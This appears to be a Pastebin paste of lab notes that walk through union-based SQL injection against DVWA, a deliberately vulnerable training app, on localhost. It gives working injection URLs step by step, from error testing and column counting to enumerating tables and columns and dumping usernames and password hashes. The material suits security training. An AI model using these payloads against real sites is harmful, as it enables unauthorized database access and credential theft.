Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Download DVWA - Damn Vulnerable Web Application
- (http://www.dvwa.co.uk/)
- Put that downloaded file in
- C:\xampp\htdocs\ {as dvwa}
- Now connect it to database, by opening the config/config.inc.php file
- textbox = $id
- Select id, fname, surname from table_name where id = 2 order by 1 --+ '
- - I put 2 as id and we got some result out of it.
- http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#
- -- In order to get an error so that we could check whether the site is vulnerable or not we will pass a quote as well
- http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2'&Submit=Submit#
- So as we got an error, means the site is vulenrable.
- - you have to find out the no of paratmeter already in the query.
- http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' order by 1 --+ &Submit=Submit#
- that what we got as 2 parameters are there.
- - now we have to inject our union with this query.
- http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' union select 5,6 --+ &Submit=Submit#
- - now we can get the database name and version of my database
- http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' union select database(), version() --+ &Submit=Submit#
- so the databse name - dvwa
- and version of my databse is - 5.6.12
- as we got the databse name, now we need to find out the table name:
- http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' union select 1,table_name from information_schema.tables --+ &Submit=Submit#
- find the Juicy Table which could give you some passwords: users
- so we find the sensitive table name, so need to proceed with column name
- http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' union select 1,column_name from information_schema.columns where table_name = 'users' --+ &Submit=Submit#
- so we got user and password as the juicy columns in users table
- Now we need to find the user and password from users table:
- http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' union select user, password from users --+ &Submit=Submit#
- so for id = 3
- first name : Hack
- Surname : Me
- username : 1337
- password : 8d3533d75ae2c3966d7e0d4fcc69216b ( charley )
Add Comment
Please, Sign In to add comment